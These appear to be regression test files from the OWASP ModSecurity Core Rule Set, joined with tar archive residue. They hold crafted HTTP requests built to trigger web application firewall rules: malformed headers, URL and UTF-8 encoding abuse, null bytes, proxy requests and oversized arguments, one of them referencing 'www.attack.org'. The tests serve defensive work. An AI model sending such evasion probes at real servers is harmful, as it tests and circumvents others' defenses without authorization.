%endremark %status 413|400 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 3 Content-Length: 3 abc %test Content-Length HTTP header is not numeric (960016) ##################################################### %remark Content-Length should only contain digits. This has a semi-colon. %endremark %status 413|400 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 3; abc %test GET or HEAD Request with Body Content (960011) ##################################################### %remark This request sends a request body while using a GET request. 
%endremark #%status 400 %output 960011 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH abc %test POST request missing Content-Length Header (960012) ##################################################### %output 960012 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded %test Invalid Use of Identity Encoding (960902) ##################################################### %output 960902 %event 960902 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Encoding: Identity %test Expect Header Not Allowed for HTTP 1.0 (960022) ##################################################### %output 960022 %event 960022 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: 
en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Expect: 100-continue %test Pragma Header requires Cache-Control Header for HTTP/1.1 requests (960020) ##################################################### %output 960020 %event 960020 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Pragma: no-cache %test Range: field exists and begins with 0 (958291) ##################################################### %output 958291 %event 958291 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Range: bytes=0- %test Range: Invalid Last Byte Value (958230) ##################################################### %output 958230 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 Keep-Alive: 300 Proxy-Connection: keep-alive Connection: close %test Range: Too many fields (958231) ##################################################### %output 958231 %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 
5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 Keep-Alive: 300 Proxy-Connection: keep-alive Connection: close %test Multiple/Conflicting Connection Header Data Found (958295) ##################################################### %output 958295 %event 958295 %var connection=keep-alive %var connection=close %request GET / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Connection: $connection, $connection %test URL Encoding Abuse Attack Attempt (950107) ##################################################### %output 950107 %event 950107 %var encoded_arg=%1G %var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33% %request GET /?parm=$encoded_arg HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Multiple URL Encoding Detected (950109) ##################################################### %output 950109 %event 950109 %var encoded_arg=%25%37%33%25%36%46%25%36%44%25%36%35%25%37%34%25%36%35%25%37%38%25%37%34%25%35%46%25%33%31%25%33%32%25%33%33%25%33%34 #%var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33% %request GET /?parm=$encoded_arg HTTP/1.1 Host: $hostname User-Agent: 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test URL Encoding Abuse Attack Attempt (950108) ##################################################### %output 950108 %event 950108 %var encoded_arg=%1G %var encoded_arg=%7%6F%6D%65%74%65%78%74%5F%31%32%33% %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: $CONTENT_LENGTH param=$encoded_arg %test URL Encoding Abuse Attack Attempt/XML (950108) ##################################################### %output 950108 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: text/xml Content-Length: $CONTENT_LENGTH <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <SOAP-ENV:Body> <xkms:StatusRequest xmlns:xkms="http://www.w3.org/2002/03/xkms#" Id="_6ee48478-fdd6-4d7d-b1bf-e7b4c3254659" ResponseId="_c1c36b3f-f962-4aea-bfbd-07ed58468c9b" Service="http://www.soapclient.com/xml/xkms2"> 
<xkms:ResponseMechanism>http://www.w3.org/2002/03/xkms#Pending</xkms:ResponseMechanism> <xkms:RespondWith>%1Gwww.attack.org</xkms:RespondWith> </xkms:StatusRequest> </SOAP-ENV:Body> </SOAP-ENV:Envelope> %test UTF8 Encoding Abuse Attack Attempt (950801) ##################################################### %output 950801 %var arg=%c0%af %var arg=%c0 %var arg=%F5%80%BF%BF %request GET /?param=$arg HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Unicode Full/Half Width Abuse Attack Attempt (950116) ##################################################### %output 950116 %request GET /?param=foo%uFF01 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Proxy access attempt (960014) ##################################################### %output 960014 %request GET http://www.some_remote_site.com/ HTTP/1.0 Host: www.some_remote_site.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Invalid character in request (960901) ##################################################### %output 960901 %event 960901 %request GET /?param=foo%00 HTTP/1.0 Host: $hostname User-Agent: 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest ����������������������������������������������modsecurity_crs_21_protocol_anomalies.tests���������������������������������������������������������0000664�0000000�0000000�00000007446�12164572564�0036674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 21 - protocol anomalies %test Request Missing a Host Header (960008) ##################################################### %output 960008 %request GET / HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Empty Host Header (960007) ##################################################### %output 960007 %request GET / HTTP/1.0 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Missing an Accept Header (960015) 
##################################################### %output 960015 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Has an Empty Accept Header (960021) ##################################################### %output 960021 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Missing a User Agent Header (960009) ##################################################### %output 960009 %request GET / HTTP/1.0 Host: $hostname Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Has an Empty User Agent Header (960006) ##################################################### %output 960006 %request GET / HTTP/1.0 Host: $hostname User-Agent: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Containing Content, but Missing Content-Type header (960904) ##################################################### %output 960904 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Length: 5 foo=1 %test Host header is a numeric IP address (960017) ##################################################### %output 960017 %request GET / HTTP/1.0 Host: 192.168.1.100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_23_request_limits.tests�������������������������������������������������������������0000664�0000000�0000000�00000211567�12164572564�0036057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 23 - Request Limits %test Argument name too long (960209) ##################################################### %output 960209 %request GET /?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Argument value too long (960208) ##################################################### %output 960208 %request GET /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Too many arguments in request (960335) ##################################################### %output 960335 %request GET 
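/?param1=1&param2=1&param3=1&param4=1&param5=1&param6=1&param7=1&param8=1&param9=1&param10=1&param11=1&param12=1&param13=1&param14=1&param15=1&param16=1&param17=1&param18=1&param19=1&param20=1&param21=1&param22=1&param23=1&param24=1&param25=1&param26=1&param27=1&param28=1&param29=1&param30=1&param31=1&param32=1&param33=1&param34=1&param35=1&param36=1&param37=1&param38=1&param39=1&param40=1&param41=1&param42=1&param43=1&param44=1&param45=1&param46=1&param47=1&param48=1&param49=1&param50=1&param51=1&param52=1&param53=1&param54=1&param55=1&param56=1&param57=1&param58=1&param59=1&param60=1&param61=1&param62=1&param63=1&param64=1&param65=1&param66=1&param67=1&param68=1&param69=1&param70=1&param71=1&param72=1&param73=1&param74=1&param75=1&param76=1&param77=1&param78=1&param79=1&param80=1&param81=1&param82=1&param83=1&param84=1&param85=1&param86=1&param87=1&param88=1&param89=1&param90=1&param91=1&param92=1&param93=1&param94=1&param95=1&param96=1&param97=1&param98=1&param99=1&param100=1&param101=1&param102=1&param103=1&param104=1&param105=1&param106=1&param107=1&param108=1&param109=1&param110=1&param111=1&param112=1&param113=1&param114=1&param115=1&param116=1&param117=1&param118=1&param119=1&param120=1&param121=1&param122=1&param123=1&param124=1&param125=1&param126=1&param127=1&param128=1&param129=1&param130=1&param131=1&param132=1&param133=1&param134=1&param135=1&param136=1&param137=1&param138=1&param139=1&param140=1&param141=1&param142=1&param143=1&param144=1&param145=1&param146=1&param147=1&param148=1&param149=1&param150=1&param151=1&param152=1&param153=1&param154=1&param155=1&param156=1&param157=1&param158=1&param159=1&param160=1&param161=1&param162=1&param163=1&param164=1&param165=1&param166=1&param167=1&param168=1&param169=1&param170=1&param171=1&param172=1&param173=1&param174=1&param175=1&param176=1&param177=1&param178=1&param179=1&param180=1&param181=1&param182=1&param183=1&param184=1&param185=1&param186=1&param187=1&param188=1&param189=1&param190=1&param191=1&param192=1&param193=1&param194=1&param195=1&param196=1&param197=1&param198=1&param199=1&param200=1&param201=1&param202=1&param203=1&param204=1&param205=1&param206=1&param207=1&param208=1&param209=1&param210=1&param211=1&param212=1&param213=1&param214=1&param215=1&param216=1&param217=1&param218=1&param219=1&param220=1&param221=1&param222=1&param223=1&param224=1&param225=1&param226=1&param227=1&param228=1&param229=1&param230=1&param231=1&param232=1&param233=1&param234=1&param235=1&param236=1&param237=1&param238=1&param239=1&param240=1&param241=1&param242=1&param243=1&param244=1&param245=1&param246=1&param247=1&param248=1&param249=1&param250=1&param251=1&param252=1&param253=1&param254=1&param255=1&param256=1 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate 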
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Total arguments size exceeded (960341) ##################################################### #%output 960341 %status 413 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 64005 foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
